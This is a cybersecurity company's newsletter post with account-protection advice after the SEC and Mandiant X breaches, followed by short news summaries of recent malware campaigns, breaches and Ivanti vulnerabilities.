#NSBCS.009 - X Marks the Spot - Protecting your Digital Identity

The recent security breaches involving the Securities and Exchange Commission's (SEC) account on the social media platform X (formerly Twitter) and the notable Mandiant X breach underscore the growing challenges in protecting digital identities onlin

Source: NSB Cyber

 

X Marks the Spot - Protecting your Digital Identity

The recent security breaches involving the Securities and Exchange Commission's (SEC) account on the social media platform X (formerly Twitter) and the notable Mandiant X breach underscore the growing challenges in protecting digital identities online. These incidents highlight the sophisticated methods employed by cyber attackers and the vulnerabilities that exist even within reputed organisations. In this context, it becomes imperative to discuss strategies for safeguarding digital identities, particularly on social media and other online platforms, these can include:

1. Strong Passwords and Unique Account Details: Essential for each online account. Unique, complex passwords help prevent multiple account breaches if one password is compromised.

2. Use of a Password Manager: Implementing a password manager is a highly effective strategy for managing and securing your online credentials. Password managers store and encrypt all your passwords, enabling you to create and use complex, unique passwords for each account without the need to remember each one.

3. Two-Factor Authentication (2FA): A critical layer of defence, as highlighted by the SEC incident, where the lack of 2FA facilitated the account takeover. 2FA, involving codes via a mobile device or authentication apps, significantly reduces unauthorised access risks.

4. Regular Monitoring and Updates: Keeping a vigilant eye on account activities and updating security settings beyond default settings is crucial. Regular reviews of login activities can alert users to unauthorised access attempts, and up-to-date contact information ensures prompt receipt of security alerts.

5. Education on Phishing and Social Engineering Attacks: Understanding and recognising phishing attempts and social engineering tactics is key. Many breaches occur when users inadvertently provide login details, so awareness and caution against suspicious emails or messages are essential.

6. Use of Security Tools and Services: Leveraging available security features and tools offered by platforms can enhance security. Features like login alerts, verification for new devices, and using password managers for secure password storage are effective measures.

7. Awareness of Platform-specific Security Features: Each platform has its own set of security features and policies. Being informed about these specific settings and recommendations is crucial for each platform used.

For information on NSB Cyber’s Cyber Resilience capabilities or to book a meeting with our team, click here.


What we read this week

  • Beware Weaponised YouTube Channels Spreading Lumma Stealer - Hackers are spreading malware called Lumma Stealer through YouTube channels. The cybercriminals are uploading videos about cracking popular software and embed malicious links in the descriptions, which if clicked will trigger the download of a ZIP file containing malware. The downloaded ZIP file includes an .LNK file that, when opened, triggers PowerShell to download a .NET execution file from a GitHub repository. This downloaded file then installs Lumma Stealer, which steals user credentials, system details, browser data, and even browser extensions.

  • Mortgage firm LoanDepot cyberattack impacts IT systems, payment portal - Mortgage firm LoanDepot has suffered a cyberattack disrupting online payments and internal systems. LoanDepot holds sensitive financial data like bank account details, raising concerns about potential phishing scams or identity theft targeting clients following the attack. Customers are advised to remain vigilant and cautious about any unsolicited communication claiming to be from the company.

  • Hackers breach Australian court hearing database - Cybercriminals have infiltrated the Victorian court system, potentially accessing recordings of court hearings between November 1 and December 21, 2023. While no other court records or employee data were compromised, the exposed hearing recordings raise concerns about sensitive information being leaked. The attack is attributed to Qilin, a notorious ransomware group known for targeting critical infrastructure and demanding hefty ransoms ranging from $50,000 to $800,000. Authorities are actively investigating the breach, and the Victorian government is urging increased vigilance against potential scams or misuse of the exposed hearing recordings.

  • Ivanti warns of Connect Secure zero-days exploited in attacks - Ivanti has disclosed two critical vulnerabilities relating to Connect Secure and Policy Secure products, with cybercriminals actively exploiting both of them. The first vulnerability (CVE-2023-46805) is an authentication bypass in the gateways' web component. This means attackers can essentially trick the system into granting them access to restricted resources, even without valid login credentials. The second vulnerability (CVE-2024-21887) is a command injection flaw, allowing attackers who have already gained some access to inject malicious commands and potentially take complete control of the vulnerable appliances. Threat intelligence company Volexity believes Chinese state-backed threat actors had targeted these exploits in December last year.

  • New Bandook RAT Variant Resurfaces, Targeting Windows Machines - A new variant of the Bandook Remote Access Trojan (RAT) has resurfaced, targeting Windows machines through deceptive phishing emails disguised as PDFs. These files embed a link directing users to a password-protected 7z archive and once downloaded and extracted with the password provided in the PDF, the malware injects its payload into a legitimate Windows process called msinfo32.exe, effectively masking its malicious activity. The malware, besides making Windows Registry changes to establish persistence on the compromised host, will establish contact with a command-and-control (C2) server to retrieve additional payloads and instructions.

    References
    https://www.darkreading.com/cyberattacks-data-breaches/weaponized-youtube-channels-spread-lumma-stealer
    https://www.bleepingcomputer.com/news/security/mortgage-firm-loandepot-cyberattack-impacts-it-systems-payment-portal/
    https://therecord.media/hackers-breach-australian-court-hearing-database
    https://www.bleepingcomputer.com/news/security/ivanti-warns-of-connect-secure-zero-days-exploited-in-attacks/
    https://thehackernews.com/2024/01/new-bandook-rat-variant-resurfaces.html
Previous
Previous

#NSBCS.010 - From the desk of the CEO | Goals v Systems - The Quest for Cyber Resilience

Next
Next

#NSBCS.008 - Safeguarding Email Environments - Australian Hospitals at Risk